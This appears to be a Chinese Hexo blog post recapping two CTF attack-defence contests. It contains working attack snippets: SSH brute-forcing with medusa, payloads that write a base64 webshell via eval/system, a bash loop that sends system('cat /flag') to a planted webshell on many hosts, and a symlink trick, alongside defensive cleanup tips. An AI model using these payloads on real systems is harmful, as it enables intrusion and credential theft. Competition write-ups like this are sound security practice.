

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>西湖&amp;湖湘有感 - Hexo</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>ゴジラ</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="西湖&湖湘有感">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-15 23:08" pubdate>
        2020年11月15日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      17
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">西湖&amp;湖湘有感</h1>
            
            <div class="markdown-body">
              <h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>AWD是这两次来首次接触的，作为躺狗躺的是真的舒服(也很难受，自己没发挥多少作用)，记下流水账，记录下一些暴露的问题。</p>
<p>13号到杭州与guoke、Y老师、ha1面基，到酒店打卡登记入住，面基了很多师傅。再后面就度过了一晚上，第二天7.30起床前往比赛场地在场地开始了一天的比赛。</p>
<p>​        比赛没开始前给的靶机就已经可以访问到，是phpcms v9.6.3，没什么cve可以一把梭，到开赛下载文件才发现有后门在附件里，直接连上就可以了。比赛是curl靶机就可以得分的那种，所以直接写一个</p>
<p> <code>while true;do curl 靶机ip+token;done</code></p>
<p>然后就看着小蓝师傅在疯狂上分qwq</p>
<p>然后半天都没人打phpcms，我就因为审计不出题在发呆。qwq</p>
<p>最后几波被上了内存马 我杀不掉 很烦。</p>
<pre><code class="hljs coq">ps aux | <span class="hljs-type">grep</span> www-data | <span class="hljs-type">awk</span> &#x27;&#123;print $<span class="hljs-number">2</span>&#125;&#x27; | <span class="hljs-type">xargs</span> kill <span class="hljs-number">-9</span>
ps aux | <span class="hljs-type">grep</span> -v grep| <span class="hljs-type">grep</span> -v PID | <span class="hljs-type">cut</span> -c <span class="hljs-number">12</span><span class="hljs-number">-16</span> | <span class="hljs-type">xargs</span> kill <span class="hljs-number">-9</span>

ps -ef | <span class="hljs-type">grep</span> -v grep| <span class="hljs-type">grep</span> -v PID | <span class="hljs-type">cut</span> -c <span class="hljs-number">12</span><span class="hljs-number">-16</span> | <span class="hljs-type">xargs</span> kill <span class="hljs-number">-9</span></code></pre>



<p>然后ctf题也没出，到最后上了watchbird看看流量（因为一上watchbird就异常，异常的话就没分）抓别人的马上车，躺了二等奖。打到最后面基本上服务都是非常卡的，所以说用python跑的话会异常的慢，可以尝试shell编程用curl跑。</p>
<p>​    本来是准备做18:58的高铁赶去湖湘杯，然后我地铁坐反了导致没赶上高铁跟guoke坐了飞机，晚上11点多到黄花机场，碰到了北极星的师傅一起打车去益阳（每人达成花了100块，有点肉疼），到酒店就睡觉去了准备好精力打第二天的比赛。</p>
<p>​    上午赛制是ctf类型的渗透题（也不像），不开网就很操蛋，有点懵逼。开始一题在web目录下就url/flag1,也有个web.tar可能这第一关是叫扫目录吧。c第二关就thinkphp rce 我用xray扫了一手，payload直接打，flag2在根目录下，有了个提示。</p>
<pre><code class="hljs apache"><span class="hljs-attribute">flag2</span>&#123;<span class="hljs-number">5</span>bc<span class="hljs-number">4</span>e<span class="hljs-number">2</span>-c<span class="hljs-number">073</span>b<span class="hljs-number">65</span>-<span class="hljs-number">39</span>d<span class="hljs-number">20</span>b<span class="hljs-number">49</span>-<span class="hljs-number">270629</span>e<span class="hljs-number">5</span>f<span class="hljs-number">11</span>&#125;
<span class="hljs-attribute">tips</span>:
<span class="hljs-attribute">1</span>.You need login the system by root,and i just can tell u the password is venus.XXXX
<span class="hljs-attribute">2</span>.X is made up of numbers.
</code></pre>



<p>爆破ssh密匙，一脸懵逼的爆破了半天，pwn师傅后面用medusa爆破出来是venus.6677</p>
<pre><code class="hljs python">medusa -M ssh -h <span class="hljs-number">192.168</span><span class="hljs-number">.157</span><span class="hljs-number">.131</span> -u root -P pwd
pwd是存有密码的文件


<span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;pwd&#x27;</span>,<span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">10000</span>):
        f.write(<span class="hljs-string">&#x27;venus.&#x27;</span> + <span class="hljs-string">&#x27;0&#x27;</span> * (<span class="hljs-number">4</span> - <span class="hljs-built_in">len</span>(<span class="hljs-built_in">str</span>(i))) + <span class="hljs-built_in">str</span>(i) + <span class="hljs-string">&#x27;\n&#x27;</span>)</code></pre>

<p>连接后flag3在根目录下，然后到这里就断了思路（甚至想到了要去docker逃逸），最后主办方提示说内网还有机器，然后是一个贼奇怪的伪协议题，没做出来。</p>
<p>​    下午的比赛就是纯awd，给了两靶机，一台上是纯web，一台是既有pwn又有web，guoke和pwn师傅去看那个既有pwn又有web的靶机去了，我就去看那个纯web的，然后我被暴捶了。改完密码之后我就是懵圈状态，连源码备份都卡住了，现在想想真不应该,（是不是可以写个脚本自动改密码、备份、改sql密码）</p>
<pre><code class="hljs awk">tar -zcvf <span class="hljs-regexp">/tmp/</span>etc.tar.gz www
tar -zxvf etc.tar.gz -C <span class="hljs-regexp">/var/</span>

mysqldump -u root --all-databases —skip-lock-tables &gt; <span class="hljs-regexp">/tmp/</span>db.sql
source <span class="hljs-regexp">/tmp/</span>db.sql
set password=password(<span class="hljs-string">&#x27;new password&#x27;</span>);  <span class="hljs-regexp">//</span>改密码

端口 netstat -tunlp
</code></pre>

<p>然后就是上waf，我的waf被我改坏了导致我一直上不去，其实可以早点测试就不会出这么多bug了。还有文件监控和流量监控脚本，凉凉qwq。</p>
<p>等前30min过后就是正式打，第一波有20几个队伍没有修理那个内存马可以直接system执行，可惜我当时已经懵了内存马都没去上，回去复现了下，最简单两种，eval和system</p>
<pre><code class="hljs elixir"><span class="hljs-comment">#eval</span>
data=&#123;<span class="hljs-string">&quot;1&quot;</span><span class="hljs-symbol">:<span class="hljs-string">&quot;file_put_contents(&#x27;1.php&#x27;,base64_decode(&#x27;&quot;</span>+base64shell+<span class="hljs-string">&quot;&#x27;));&quot;</span></span>&#125;
<span class="hljs-comment">#system</span>
data=&#123;<span class="hljs-string">&quot;1&quot;</span><span class="hljs-symbol">:<span class="hljs-string">&quot;echo &quot;</span>+base64shell+<span class="hljs-string">&quot;|base64 -d &gt; 1.php&quot;</span></span>&#125;</code></pre>



<p>再后面就手动提交flag，（后面研究研究怎么自动提交）</p>
<p>guoke当时获取flag的脚本</p>
<pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> $(<span class="hljs-built_in">echo</span> &#123;101..150&#125;)
<span class="hljs-keyword">do</span>
&#123;
	<span class="hljs-built_in">echo</span> 172.16.<span class="hljs-variable">$i</span>.245 ;curl http://172.16.<span class="hljs-variable">$i</span>.245/Uploads/.Guoke.php -X POST -d <span class="hljs-string">&quot;Guoke=guokeguokeguokea&amp;guoke=system(&#x27;cat /flag&#x27;);&quot;</span>&gt; <span class="hljs-variable">$i</span>
&#125;&amp;
<span class="hljs-keyword">done</span>


<span class="hljs-comment">#python </span>
import os
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(101,151):
    result=os.popen(<span class="hljs-string">&#x27;cat &#x27;</span>+str(i)).<span class="hljs-built_in">read</span>()
    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;404&#x27;</span> <span class="hljs-keyword">in</span> result or <span class="hljs-string">&#x27;403&#x27;</span> <span class="hljs-keyword">in</span> result:
        pass
    <span class="hljs-keyword">else</span>:
        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;172.16.&#x27;</span>+str(i)+<span class="hljs-string">&#x27;.245&#x27;</span>+<span class="hljs-string">&#x27; &#x27;</span>+result)
</code></pre>



<p>到后面我管的那台机子已经彻底崩溃了</p>
<p>发现了几个奇怪的东西 比如说改了文件夹的归属（awd一般不给root权限）后面运维就贼麻烦，生成ln文件指向flag</p>
<pre><code class="hljs armasm"><span class="hljs-symbol">ln</span> -<span class="hljs-built_in">sb</span> /flag md5.png
-<span class="hljs-keyword">b</span> 覆盖以前的</code></pre>

<p>这个跟不死马差不多，防御的方法也差不多</p>
<pre><code class="hljs vim"><span class="hljs-number">1</span>.<span class="hljs-keyword">ps</span> auxww|<span class="hljs-keyword">grep</span> <span class="hljs-keyword">shell</span>.php 找到pid后杀掉进程就可以，你删掉脚本是起不了作用的，因为php执行的时候已经把脚本读进去解释成opcode运行了

<span class="hljs-number">2</span>.重启php等web服务

<span class="hljs-number">3</span>.用一个ignore_user_abort(true)脚本，一直竞争写入（断断续续）。usleep要低于对方不死马设置的值。

<span class="hljs-number">4</span>.创建一个和不死马生成的马一样名字的文件夹。</code></pre>





<p>最后就躺了三等奖qwq，还是得多学学运维，多做准备工作</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/12/%E5%BD%B1%E5%AD%90%E8%B4%A6%E5%8F%B7/">
                        <span class="hidden-mobile">影子账号</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
